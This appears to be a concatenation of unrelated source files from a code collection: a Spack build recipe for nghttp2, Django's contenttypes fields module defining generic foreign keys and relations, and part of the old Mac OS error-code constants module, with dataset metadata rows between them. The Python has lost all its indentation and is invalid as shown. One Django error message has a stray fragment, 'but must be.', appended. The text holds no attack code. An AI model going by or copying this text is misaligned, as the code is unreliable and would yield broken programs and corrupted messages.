# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Nghttp2(AutotoolsPackage):
"""nghttp2 is an implementation of HTTP/2 and its header compression
algorithm HPACK in C."""
homepage = "https://nghttp2.org/"
url = "https://github.com/nghttp2/nghttp2/releases/download/v1.26.0/nghttp2-1.26.0.tar.gz"
version('1.26.0', '83fa813b22bacbc6ea80dfb24847569f')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-setuptools', type=('build'))
def setup_environment(self, spack_env, run_env):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
spack_env.prepend_path('PYTHONPATH', site_packages_dir)
@run_before('install')
def ensure_install_dir_exists(self):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
mkdirp(site_packages_dir)
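    # Editor's note: with this package file in place, `spack install nghttp2`
    # builds the library and its Python bindings into the prefix, and the
    # hooks above keep PYTHONPATH and the site-packages directory consistent.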
| lgpl-2.1 | 2,025,054,012,411,842,300 | 41.944444 | 99 | 0.6395 | false |
rmboggs/django | django/contrib/contenttypes/fields.py | 21 | 24531 | from __future__ import unicode_literals
from collections import defaultdict
from django.contrib.contenttypes.models import ContentType
from django.core import checks
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, models, router, transaction
from django.db.models import DO_NOTHING, signals
from django.db.models.base import ModelBase, make_foreign_order_accessors
from django.db.models.fields.related import (
ForeignObject, ForeignObjectRel, ReverseManyToOneDescriptor,
lazy_related_operation,
)
from django.db.models.query_utils import PathInfo
from django.utils.encoding import python_2_unicode_compatible, smart_text
from django.utils.functional import cached_property
@python_2_unicode_compatible
class GenericForeignKey(object):
"""
Provide a generic many-to-one relation through the ``content_type`` and
``object_id`` fields.
This class also doubles as an accessor to the related object (similar to
ForwardManyToOneDescriptor) by adding itself as a model attribute.
"""
# Field flags
auto_created = False
concrete = False
editable = False
hidden = False
is_relation = True
many_to_many = False
many_to_one = True
one_to_many = False
one_to_one = False
related_model = None
remote_field = None
def __init__(self, ct_field='content_type', fk_field='object_id', for_concrete_model=True):
self.ct_field = ct_field
self.fk_field = fk_field
self.for_concrete_model = for_concrete_model
self.editable = False
self.rel = None
self.column = None
def contribute_to_class(self, cls, name, **kwargs):
self.name = name
self.model = cls
self.cache_attr = "_%s_cache" % name
cls._meta.add_field(self, virtual=True)
# Only run pre-initialization field assignment on non-abstract models
if not cls._meta.abstract:
signals.pre_init.connect(self.instance_pre_init, sender=cls)
setattr(cls, name, self)
def get_filter_kwargs_for_object(self, obj):
"""See corresponding method on Field"""
return {
self.fk_field: getattr(obj, self.fk_field),
self.ct_field: getattr(obj, self.ct_field),
}
def get_forward_related_filter(self, obj):
"""See corresponding method on RelatedField"""
return {
self.fk_field: obj.pk,
self.ct_field: ContentType.objects.get_for_model(obj).pk,
}
def __str__(self):
model = self.model
app = model._meta.app_label
return '%s.%s.%s' % (app, model._meta.object_name, self.name)
def check(self, **kwargs):
errors = []
errors.extend(self._check_field_name())
errors.extend(self._check_object_id_field())
errors.extend(self._check_content_type_field())
return errors
def _check_field_name(self):
if self.name.endswith("_"):
return [
checks.Error(
'Field names must not end with an underscore.',
hint=None,
obj=self,
id='fields.E001',
)
]
else:
return []
def _check_object_id_field(self):
try:
self.model._meta.get_field(self.fk_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey object ID references the non-existent field '%s'." % self.fk_field,
hint=None,
obj=self,
id='contenttypes.E001',
)
]
else:
return []
def _check_content_type_field(self):
"""
Check if field named `field_name` in model `model` exists and is a
valid content_type field (is a ForeignKey to ContentType).
"""
try:
field = self.model._meta.get_field(self.ct_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey content type references the non-existent field '%s.%s'." % (
self.model._meta.object_name, self.ct_field
),
hint=None,
obj=self,
id='contenttypes.E002',
)
]
else:
if not isinstance(field, models.ForeignKey):
return [
checks.Error(
"'%s.%s' is not a ForeignKey." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E003',
)
]
elif field.remote_field.model != ContentType:
return [
checks.Error(
"'%s.%s' is not a ForeignKey to 'contenttypes.ContentType'." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def instance_pre_init(self, signal, sender, args, kwargs, **_kwargs):
"""
Handle initializing an object with the generic FK instead of
content_type and object_id fields.
"""
if self.name in kwargs:
value = kwargs.pop(self.name)
if value is not None:
kwargs[self.ct_field] = self.get_content_type(obj=value)
kwargs[self.fk_field] = value._get_pk_val()
else:
kwargs[self.ct_field] = None
kwargs[self.fk_field] = None
def get_content_type(self, obj=None, id=None, using=None):
if obj is not None:
return ContentType.objects.db_manager(obj._state.db).get_for_model(
obj, for_concrete_model=self.for_concrete_model)
elif id is not None:
return ContentType.objects.db_manager(using).get_for_id(id)
else:
# This should never happen. I love comments like this, don't you?
raise Exception("Impossible arguments to GFK.get_content_type!")
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is not None:
raise ValueError("Custom queryset can't be used for this lookup.")
# For efficiency, group the instances by content type and then do one
# query per model
fk_dict = defaultdict(set)
# We need one instance for each group in order to get the right db:
instance_dict = {}
ct_attname = self.model._meta.get_field(self.ct_field).get_attname()
for instance in instances:
# We avoid looking for values if either ct_id or fkey value is None
ct_id = getattr(instance, ct_attname)
if ct_id is not None:
fk_val = getattr(instance, self.fk_field)
if fk_val is not None:
fk_dict[ct_id].add(fk_val)
instance_dict[ct_id] = instance
ret_val = []
for ct_id, fkeys in fk_dict.items():
instance = instance_dict[ct_id]
ct = self.get_content_type(id=ct_id, using=instance._state.db)
ret_val.extend(ct.get_all_objects_for_this_type(pk__in=fkeys))
# For doing the join in Python, we have to match both the FK val and the
# content type, so we use a callable that returns a (fk, class) pair.
def gfk_key(obj):
ct_id = getattr(obj, ct_attname)
if ct_id is None:
return None
else:
model = self.get_content_type(id=ct_id,
using=obj._state.db).model_class()
return (model._meta.pk.get_prep_value(getattr(obj, self.fk_field)),
model)
return (ret_val,
lambda obj: (obj._get_pk_val(), obj.__class__),
gfk_key,
True,
self.cache_attr)
def is_cached(self, instance):
return hasattr(instance, self.cache_attr)
def __get__(self, instance, cls=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_attr)
except AttributeError:
rel_obj = None
# Make sure to use ContentType.objects.get_for_id() to ensure that
# lookups are cached (see ticket #5570). This takes more code than
# the naive ``getattr(instance, self.ct_field)``, but has better
# performance when dealing with GFKs in loops and such.
f = self.model._meta.get_field(self.ct_field)
ct_id = getattr(instance, f.get_attname(), None)
if ct_id is not None:
ct = self.get_content_type(id=ct_id, using=instance._state.db)
try:
rel_obj = ct.get_object_for_this_type(pk=getattr(instance, self.fk_field))
except ObjectDoesNotExist:
pass
setattr(instance, self.cache_attr, rel_obj)
return rel_obj
def __set__(self, instance, value):
ct = None
fk = None
if value is not None:
ct = self.get_content_type(obj=value)
fk = value._get_pk_val()
setattr(instance, self.ct_field, ct)
setattr(instance, self.fk_field, fk)
setattr(instance, self.cache_attr, value)
class GenericRel(ForeignObjectRel):
"""
Used by GenericRelation to store information about the relation.
"""
def __init__(self, field, to, related_name=None, related_query_name=None, limit_choices_to=None):
super(GenericRel, self).__init__(
field, to,
related_name=related_query_name or '+',
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
on_delete=DO_NOTHING,
)
class GenericRelation(ForeignObject):
"""
Provide a reverse to a relation created by a GenericForeignKey.
"""
# Field flags
auto_created = False
many_to_many = False
many_to_one = False
one_to_many = True
one_to_one = False
rel_class = GenericRel
def __init__(self, to, object_id_field='object_id', content_type_field='content_type',
for_concrete_model=True, related_query_name=None, limit_choices_to=None, **kwargs):
kwargs['rel'] = self.rel_class(
self, to,
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
)
kwargs['blank'] = True
kwargs['on_delete'] = models.CASCADE
kwargs['editable'] = False
kwargs['serialize'] = False
# This construct is somewhat of an abuse of ForeignObject. This field
# represents a relation from pk to object_id field. But, this relation
# isn't direct, the join is generated reverse along foreign key. So,
# the from_field is object_id field, to_field is pk because of the
# reverse join.
super(GenericRelation, self).__init__(
to, from_fields=[object_id_field], to_fields=[], **kwargs)
self.object_id_field_name = object_id_field
self.content_type_field_name = content_type_field
self.for_concrete_model = for_concrete_model
def check(self, **kwargs):
errors = super(GenericRelation, self).check(**kwargs)
errors.extend(self._check_generic_foreign_key_existence())
return errors
def _check_generic_foreign_key_existence(self):
target = self.remote_field.model
if isinstance(target, ModelBase):
fields = target._meta.virtual_fields
if any(isinstance(field, GenericForeignKey) and
field.ct_field == self.content_type_field_name and
field.fk_field == self.object_id_field_name
for field in fields):
return []
else:
return [
checks.Error(
("The GenericRelation defines a relation with the model "
"'%s.%s', but that model does not have a GenericForeignKey.") % (
target._meta.app_label, target._meta.object_name
),
hint=None,
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def resolve_related_fields(self):
self.to_fields = [self.model._meta.pk.name]
return [(self.remote_field.model._meta.get_field(self.object_id_field_name), self.model._meta.pk)]
def get_path_info(self):
opts = self.remote_field.model._meta
target = opts.pk
return [PathInfo(self.model._meta, opts, (target,), self.remote_field, True, False)]
def get_reverse_path_info(self):
opts = self.model._meta
from_opts = self.remote_field.model._meta
return [PathInfo(from_opts, opts, (opts.pk,), self, not self.unique, False)]
def get_choices_default(self):
return super(GenericRelation, self).get_choices(include_blank=False)
def value_to_string(self, obj):
qs = getattr(obj, self.name).all()
return smart_text([instance._get_pk_val() for instance in qs])
def contribute_to_class(self, cls, name, **kwargs):
kwargs['virtual_only'] = True
super(GenericRelation, self).contribute_to_class(cls, name, **kwargs)
self.model = cls
setattr(cls, self.name, ReverseGenericManyToOneDescriptor(self.remote_field))
# Add get_RELATED_order() and set_RELATED_order() methods if the model
# on the other end of this relation is ordered with respect to this.
def matching_gfk(field):
return (
isinstance(field, GenericForeignKey) and
self.content_type_field_name == field.ct_field and
self.object_id_field_name == field.fk_field
)
def make_generic_foreign_order_accessors(related_model, model):
if matching_gfk(model._meta.order_with_respect_to):
make_foreign_order_accessors(model, related_model)
lazy_related_operation(make_generic_foreign_order_accessors, self.model, self.remote_field.model)
def set_attributes_from_rel(self):
pass
def get_internal_type(self):
return "ManyToManyField"
def get_content_type(self):
"""
Return the content type associated with this field's model.
"""
return ContentType.objects.get_for_model(self.model,
for_concrete_model=self.for_concrete_model)
def get_extra_restriction(self, where_class, alias, remote_alias):
field = self.remote_field.model._meta.get_field(self.content_type_field_name)
contenttype_pk = self.get_content_type().pk
cond = where_class()
lookup = field.get_lookup('exact')(field.get_col(remote_alias), contenttype_pk)
cond.add(lookup, 'AND')
return cond
def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
"""
Return all objects related to ``objs`` via this ``GenericRelation``.
"""
return self.remote_field.model._base_manager.db_manager(using).filter(**{
"%s__pk" % self.content_type_field_name: ContentType.objects.db_manager(using).get_for_model(
self.model, for_concrete_model=self.for_concrete_model).pk,
"%s__in" % self.object_id_field_name: [obj.pk for obj in objs]
})
class ReverseGenericManyToOneDescriptor(ReverseManyToOneDescriptor):
"""
Accessor to the related objects manager on the one-to-many relation created
by GenericRelation.
In the example::
class Post(Model):
comments = GenericRelation(Comment)
``post.comments`` is a ReverseGenericManyToOneDescriptor instance.
"""
@cached_property
def related_manager_cls(self):
return create_generic_related_manager(
self.rel.model._default_manager.__class__,
self.rel,
)
def create_generic_related_manager(superclass, rel):
"""
Factory function to create a manager that subclasses another manager
(generally the default manager of a given model) and adds behaviors
specific to generic relations.
"""
class GenericRelatedObjectManager(superclass):
def __init__(self, instance=None):
super(GenericRelatedObjectManager, self).__init__()
self.instance = instance
self.model = rel.model
content_type = ContentType.objects.db_manager(instance._state.db).get_for_model(
instance, for_concrete_model=rel.field.for_concrete_model)
self.content_type = content_type
self.content_type_field_name = rel.field.content_type_field_name
self.object_id_field_name = rel.field.object_id_field_name
self.prefetch_cache_name = rel.field.attname
self.pk_val = instance._get_pk_val()
self.core_filters = {
'%s__pk' % self.content_type_field_name: content_type.id,
self.object_id_field_name: self.pk_val,
}
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_generic_related_manager(manager.__class__, rel)
return manager_class(instance=self.instance)
do_not_call_in_templates = True
def __str__(self):
return repr(self)
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**self.core_filters)
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(GenericRelatedObjectManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
query = {
'%s__pk' % self.content_type_field_name: self.content_type.id,
'%s__in' % self.object_id_field_name: set(obj._get_pk_val() for obj in instances)
}
# We (possibly) need to convert object IDs to the type of the
# instances' PK in order to match up instances:
object_id_converter = instances[0]._meta.pk.to_python
return (queryset.filter(**query),
lambda relobj: object_id_converter(getattr(relobj, self.object_id_field_name)),
lambda obj: obj._get_pk_val(),
False,
self.prefetch_cache_name)
def add(self, *objs, **kwargs):
bulk = kwargs.pop('bulk', True)
db = router.db_for_write(self.model, instance=self.instance)
def check_and_update_obj(obj):
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected, got %r" % (
self.model._meta.object_name, obj
))
setattr(obj, self.content_type_field_name, self.content_type)
setattr(obj, self.object_id_field_name, self.pk_val)
if bulk:
pks = []
for obj in objs:
if obj._state.adding or obj._state.db != db:
raise ValueError(
"%r instance isn't saved. Use bulk=False or save "
"the object first. but must be." % obj
)
check_and_update_obj(obj)
pks.append(obj.pk)
self.model._base_manager.using(db).filter(pk__in=pks).update(**{
self.content_type_field_name: self.content_type,
self.object_id_field_name: self.pk_val,
})
else:
with transaction.atomic(using=db, savepoint=False):
for obj in objs:
check_and_update_obj(obj)
obj.save()
add.alters_data = True
def remove(self, *objs, **kwargs):
if not objs:
return
bulk = kwargs.pop('bulk', True)
self._clear(self.filter(pk__in=[o.pk for o in objs]), bulk)
remove.alters_data = True
def clear(self, **kwargs):
bulk = kwargs.pop('bulk', True)
self._clear(self, bulk)
clear.alters_data = True
def _clear(self, queryset, bulk):
db = router.db_for_write(self.model, instance=self.instance)
queryset = queryset.using(db)
if bulk:
# `QuerySet.delete()` creates its own atomic block which
# contains the `pre_delete` and `post_delete` signal handlers.
queryset.delete()
else:
with transaction.atomic(using=db, savepoint=False):
for obj in queryset:
obj.delete()
_clear.alters_data = True
def set(self, objs, **kwargs):
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
bulk = kwargs.pop('bulk', True)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs, bulk=bulk)
else:
old_objs = set(self.using(db).all())
new_objs = []
for obj in objs:
if obj in old_objs:
old_objs.remove(obj)
else:
new_objs.append(obj)
self.remove(*old_objs)
self.add(*new_objs, bulk=bulk)
set.alters_data = True
def create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).get_or_create(**kwargs)
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).update_or_create(**kwargs)
update_or_create.alters_data = True
return GenericRelatedObjectManager
| bsd-3-clause | -623,779,507,485,694,100 | 38.186901 | 116 | 0.56023 | false |
gameduell/duell | bin/mac/python2.7.9/lib/python2.7/plat-mac/macerrors.py | 40 | 116661 | # -coding=latin1-
from warnings import warnpy3k
warnpy3k("In 3.x, the macerrors module is removed.", stacklevel=2)
svTempDisable = -32768 #svTempDisable
svDisabled = -32640 #Reserve range -32640 to -32768 for Apple temp disables.
fontNotOutlineErr = -32615 #bitmap font passed to routine that does outlines only
kURL68kNotSupportedError = -30788 #kURL68kNotSupportedError
kURLAccessNotAvailableError = -30787 #kURLAccessNotAvailableError
kURLInvalidConfigurationError = -30786 #kURLInvalidConfigurationError
kURLExtensionFailureError = -30785 #kURLExtensionFailureError
kURLFileEmptyError = -30783 #kURLFileEmptyError
kURLInvalidCallError = -30781 #kURLInvalidCallError
kURLUnsettablePropertyError = -30780 #kURLUnsettablePropertyError
kURLPropertyBufferTooSmallError = -30779 #kURLPropertyBufferTooSmallError
kURLUnknownPropertyError = -30778 #kURLUnknownPropertyError
kURLPropertyNotYetKnownError = -30777 #kURLPropertyNotYetKnownError
kURLAuthenticationError = -30776 #kURLAuthenticationError
kURLServerBusyError = -30775 #kURLServerBusyError
kURLUnsupportedSchemeError = -30774 #kURLUnsupportedSchemeError
kURLInvalidURLError = -30773 #kURLInvalidURLError
kURLDestinationExistsError = -30772 #kURLDestinationExistsError
kURLProgressAlreadyDisplayedError = -30771 #kURLProgressAlreadyDisplayedError
kURLInvalidURLReferenceError = -30770 #kURLInvalidURLReferenceError
controlHandleInvalidErr = -30599 #controlHandleInvalidErr
controlInvalidDataVersionErr = -30597 #controlInvalidDataVersionErr
errItemNotControl = -30596 #errItemNotControl
errCantEmbedRoot = -30595 #errCantEmbedRoot
errCantEmbedIntoSelf = -30594 #errCantEmbedIntoSelf
errWindowRegionCodeInvalid = -30593 #errWindowRegionCodeInvalid
errControlHiddenOrDisabled = -30592 #errControlHiddenOrDisabled
errDataSizeMismatch = -30591 #errDataSizeMismatch
errControlIsNotEmbedder = -30590 #errControlIsNotEmbedder
errControlsAlreadyExist = -30589 #errControlsAlreadyExist
errInvalidPartCode = -30588 #errInvalidPartCode
errRootAlreadyExists = -30587 #errRootAlreadyExists
errNoRootControl = -30586 #errNoRootControl
errCouldntSetFocus = -30585 #errCouldntSetFocus
errUnknownControl = -30584 #errUnknownControl
errWindowDoesntSupportFocus = -30583 #errWindowDoesntSupportFocus
errControlDoesntSupportFocus = -30582 #errControlDoesntSupportFocus
errDataNotSupported = -30581 #errDataNotSupported
errMessageNotSupported = -30580 #errMessageNotSupported
themeMonitorDepthNotSupportedErr = -30567 #theme not supported at monitor depth
themeScriptFontNotFoundErr = -30566 #theme font requested for uninstalled script system
themeBadCursorIndexErr = -30565 #themeBadCursorIndexErr
themeHasNoAccentsErr = -30564 #themeHasNoAccentsErr
themeBadTextColorErr = -30563 #themeBadTextColorErr
themeProcessNotRegisteredErr = -30562 #themeProcessNotRegisteredErr
themeProcessRegisteredErr = -30561 #themeProcessRegisteredErr
themeInvalidBrushErr = -30560 #pattern index invalid
qtvrUninitialized = -30555 #qtvrUninitialized
qtvrLibraryLoadErr = -30554 #qtvrLibraryLoadErr
streamingNodeNotReadyErr = -30553 #streamingNodeNotReadyErr
noMemoryNodeFailedInitialize = -30552 #noMemoryNodeFailedInitialize
invalidHotSpotIDErr = -30551 #invalidHotSpotIDErr
invalidNodeFormatErr = -30550 #invalidNodeFormatErr
limitReachedErr = -30549 #limitReachedErr
settingNotSupportedByNodeErr = -30548 #settingNotSupportedByNodeErr
propertyNotSupportedByNodeErr = -30547 #propertyNotSupportedByNodeErr
timeNotInViewErr = -30546 #timeNotInViewErr
invalidViewStateErr = -30545 #invalidViewStateErr
invalidNodeIDErr = -30544 #invalidNodeIDErr
selectorNotSupportedByNodeErr = -30543 #selectorNotSupportedByNodeErr
callNotSupportedByNodeErr = -30542 #callNotSupportedByNodeErr
constraintReachedErr = -30541 #constraintReachedErr
notAQTVRMovieErr = -30540 #notAQTVRMovieErr
kFBCnoSuchHit = -30532 #kFBCnoSuchHit
kFBCbadSearchSession = -30531 #kFBCbadSearchSession
kFBCindexDiskIOFailed = -30530 #kFBCindexDiskIOFailed
kFBCsummarizationCanceled = -30529 #kFBCsummarizationCanceled
kFBCbadIndexFileVersion = -30528 #kFBCbadIndexFileVersion
kFBCanalysisNotAvailable = -30527 #kFBCanalysisNotAvailable
kFBCillegalSessionChange = -30526 #tried to add/remove vols to a session
kFBCsomeFilesNotIndexed = -30525 #kFBCsomeFilesNotIndexed
kFBCsearchFailed = -30524 #kFBCsearchFailed
kFBCindexNotAvailable = -30523 #kFBCindexNotAvailable
kFBCindexFileDestroyed = -30522 #kFBCindexFileDestroyed
kFBCaccessCanceled = -30521 #kFBCaccessCanceled
kFBCindexingCanceled = -30520 #kFBCindexingCanceled
kFBCnoSearchSession = -30519 #kFBCnoSearchSession
kFBCindexNotFound = -30518 #kFBCindexNotFound
kFBCflushFailed = -30517 #kFBCflushFailed
kFBCaddDocFailed = -30516 #kFBCaddDocFailed
kFBCaccessorStoreFailed = -30515 #kFBCaccessorStoreFailed
kFBCindexCreationFailed = -30514 #couldn't create index
kFBCmergingFailed = -30513 #couldn't merge index files
kFBCtokenizationFailed = -30512 #couldn't read from document or query
kFBCmoveFailed = -30511 #V-Twin exception caught
kFBCdeletionFailed = -30510 #V-Twin exception caught
kFBCcommitFailed = -30509 #V-Twin exception caught
kFBCindexingFailed = -30508 #V-Twin exception caught
kFBCvalidationFailed = -30507 #V-Twin exception caught
kFBCcompactionFailed = -30506 #V-Twin exception caught
kFBCbadIndexFile = -30505 #bad FSSpec, or bad data in file
kFBCfileNotIndexed = -30504 #kFBCfileNotIndexed
kFBCbadParam = -30503 #kFBCbadParam
kFBCallocFailed = -30502 #probably low memory
kFBCnoIndexesFound = -30501 #kFBCnoIndexesFound
kFBCvTwinExceptionErr = -30500 #no telling what it was
kDSpStereoContextErr = -30450 #kDSpStereoContextErr
kDSpInternalErr = -30449 #kDSpInternalErr
kDSpConfirmSwitchWarning = -30448 #kDSpConfirmSwitchWarning
kDSpFrameRateNotReadyErr = -30447 #kDSpFrameRateNotReadyErr
kDSpContextNotFoundErr = -30446 #kDSpContextNotFoundErr
kDSpContextNotReservedErr = -30445 #kDSpContextNotReservedErr
kDSpContextAlreadyReservedErr = -30444 #kDSpContextAlreadyReservedErr
kDSpInvalidAttributesErr = -30443 #kDSpInvalidAttributesErr
kDSpInvalidContextErr = -30442 #kDSpInvalidContextErr
kDSpSystemSWTooOldErr = -30441 #kDSpSystemSWTooOldErr
kDSpNotInitializedErr = -30440 #kDSpNotInitializedErr
kISpListBusyErr = -30429 #kISpListBusyErr
kISpDeviceActiveErr = -30428 #kISpDeviceActiveErr
kISpSystemActiveErr = -30427 #kISpSystemActiveErr
kISpDeviceInactiveErr = -30426 #kISpDeviceInactiveErr
kISpSystemInactiveErr = -30425 #kISpSystemInactiveErr
kISpElementNotInListErr = -30424 #kISpElementNotInListErr
kISpElementInListErr = -30423 #kISpElementInListErr
kISpBufferToSmallErr = -30422 #kISpBufferToSmallErr
kISpSystemListErr = -30421 #kISpSystemListErr
kISpInternalErr = -30420 #kISpInternalErr
kNSpJoinFailedErr = -30399 #kNSpJoinFailedErr
kNSpCantBlockErr = -30398 #kNSpCantBlockErr
kNSpMessageTooBigErr = -30397 #kNSpMessageTooBigErr
kNSpSendFailedErr = -30396 #kNSpSendFailedErr
kNSpConnectFailedErr = -30395 #kNSpConnectFailedErr
kNSpGameTerminatedErr = -30394 #kNSpGameTerminatedErr
kNSpTimeoutErr = -30393 #kNSpTimeoutErr
kNSpInvalidProtocolListErr = -30392 #kNSpInvalidProtocolListErr
kNSpInvalidProtocolRefErr = -30391 #kNSpInvalidProtocolRefErr
kNSpInvalidDefinitionErr = -30390 #kNSpInvalidDefinitionErr
kNSpAddPlayerFailedErr = -30389 #kNSpAddPlayerFailedErr
kNSpCreateGroupFailedErr = -30388 #kNSpCreateGroupFailedErr
kNSpNoHostVolunteersErr = -30387 #kNSpNoHostVolunteersErr
kNSpNoGroupsErr = -30386 #kNSpNoGroupsErr
kNSpNoPlayersErr = -30385 #kNSpNoPlayersErr
kNSpInvalidGroupIDErr = -30384 #kNSpInvalidGroupIDErr
kNSpInvalidPlayerIDErr = -30383 #kNSpInvalidPlayerIDErr
kNSpNameRequiredErr = -30382 #kNSpNameRequiredErr
kNSpFeatureNotImplementedErr = -30381 #kNSpFeatureNotImplementedErr
kNSpAddressInUseErr = -30380 #kNSpAddressInUseErr
kNSpRemovePlayerFailedErr = -30379 #kNSpRemovePlayerFailedErr
kNSpFreeQExhaustedErr = -30378 #kNSpFreeQExhaustedErr
kNSpInvalidAddressErr = -30377 #kNSpInvalidAddressErr
kNSpNotAdvertisingErr = -30376 #kNSpNotAdvertisingErr
kNSpAlreadyAdvertisingErr = -30374 #kNSpAlreadyAdvertisingErr
kNSpMemAllocationErr = -30373 #kNSpMemAllocationErr
kNSpOTVersionTooOldErr = -30371 #kNSpOTVersionTooOldErr
kNSpOTNotPresentErr = -30370 #kNSpOTNotPresentErr
kNSpInvalidParameterErr = -30369 #kNSpInvalidParameterErr
kNSpInvalidGameRefErr = -30367 #kNSpInvalidGameRefErr
kNSpProtocolNotAvailableErr = -30366 #kNSpProtocolNotAvailableErr
kNSpHostFailedErr = -30365 #kNSpHostFailedErr
kNSpPipeFullErr = -30364 #kNSpPipeFullErr
kNSpTopologyNotSupportedErr = -30362 #kNSpTopologyNotSupportedErr
kNSpAlreadyInitializedErr = -30361 #kNSpAlreadyInitializedErr
kNSpInitializationFailedErr = -30360 #kNSpInitializationFailedErr
kSSpScaleToZeroErr = -30344 #kSSpScaleToZeroErr
kSSpParallelUpVectorErr = -30343 #kSSpParallelUpVectorErr
kSSpCantInstallErr = -30342 #kSSpCantInstallErr
kSSpVersionErr = -30341 #kSSpVersionErr
kSSpInternalErr = -30340 #kSSpInternalErr
kALMInternalErr = -30049 #kALMInternalErr
kALMGroupNotFoundErr = -30048 #kALMGroupNotFoundErr
kALMNoSuchModuleErr = -30047 #kALMNoSuchModuleErr
kALMModuleCommunicationErr = -30046 #kALMModuleCommunicationErr
kALMDuplicateModuleErr = -30045 #kALMDuplicateModuleErr
kALMInstallationErr = -30044 #kALMInstallationErr
kALMDeferSwitchErr = -30043 #kALMDeferSwitchErr
kALMRebootFlagsLevelErr = -30042 #kALMRebootFlagsLevelErr
kLocalesDefaultDisplayStatus = -30029 #Requested display locale unavailable, used default
kLocalesTableFormatErr = -30002 #kLocalesTableFormatErr
kLocalesBufferTooSmallErr = -30001 #kLocalesBufferTooSmallErr
kFNSNameNotFoundErr = -29589 #The name with the requested parameters was not found
kFNSBadFlattenedSizeErr = -29587 #flattened size didn't match input or was too small
kFNSInsufficientDataErr = -29586 #insufficient data for the operation
kFNSMismatchErr = -29585 #reference didn't match or wasn't found in profile
kFNSDuplicateReferenceErr = -29584 #the ref. being added is already in the profile
kFNSBadProfileVersionErr = -29583 #profile version is out of known range
kFNSInvalidProfileErr = -29582 #profile is NULL or otherwise bad
kFNSBadReferenceVersionErr = -29581 #ref. version is out of known range
kFNSInvalidReferenceErr = -29580 #ref. was NULL or otherwise bad
kCollateInvalidCollationRef = -29507 #kCollateInvalidCollationRef
kCollateBufferTooSmall = -29506 #kCollateBufferTooSmall
kCollateInvalidChar = -29505 #kCollateInvalidChar
kCollatePatternNotFoundErr = -29504 #kCollatePatternNotFoundErr
kCollateUnicodeConvertFailedErr = -29503 #kCollateUnicodeConvertFailedErr
kCollateMissingUnicodeTableErr = -29502 #kCollateMissingUnicodeTableErr
kCollateInvalidOptions = -29501 #kCollateInvalidOptions
kCollateAttributesNotFoundErr = -29500 #kCollateAttributesNotFoundErr
kMPInvalidIDErr = -29299 #kMPInvalidIDErr
kMPInsufficientResourcesErr = -29298 #kMPInsufficientResourcesErr
kMPTaskAbortedErr = -29297 #kMPTaskAbortedErr
kMPTimeoutErr = -29296 #kMPTimeoutErr
kMPDeletedErr = -29295 #kMPDeletedErr
kMPBlueBlockingErr = -29293 #kMPBlueBlockingErr
kMPTaskStoppedErr = -29292 #A convention used with MPThrowException.
kMPTaskBlockedErr = -29291 #kMPTaskBlockedErr
kMPTaskCreatedErr = -29290 #kMPTaskCreatedErr
kMPProcessTerminatedErr = -29289 #kMPProcessTerminatedErr
kMPProcessCreatedErr = -29288 #kMPProcessCreatedErr
kMPPrivilegedErr = -29276 #kMPPrivilegedErr
kMPIterationEndErr = -29275 #kMPIterationEndErr
kUCTextBreakLocatorMissingType = -25341 #Unicode text break error
kUCOutputBufferTooSmall = -25340 #Output buffer too small for Unicode string result
errKCCreateChainFailed = -25318 #errKCCreateChainFailed
errKCDataNotModifiable = -25317 #errKCDataNotModifiable
errKCDataNotAvailable = -25316 #errKCDataNotAvailable
errKCInteractionRequired = -25315 #errKCInteractionRequired
errKCNoPolicyModule = -25314 #errKCNoPolicyModule
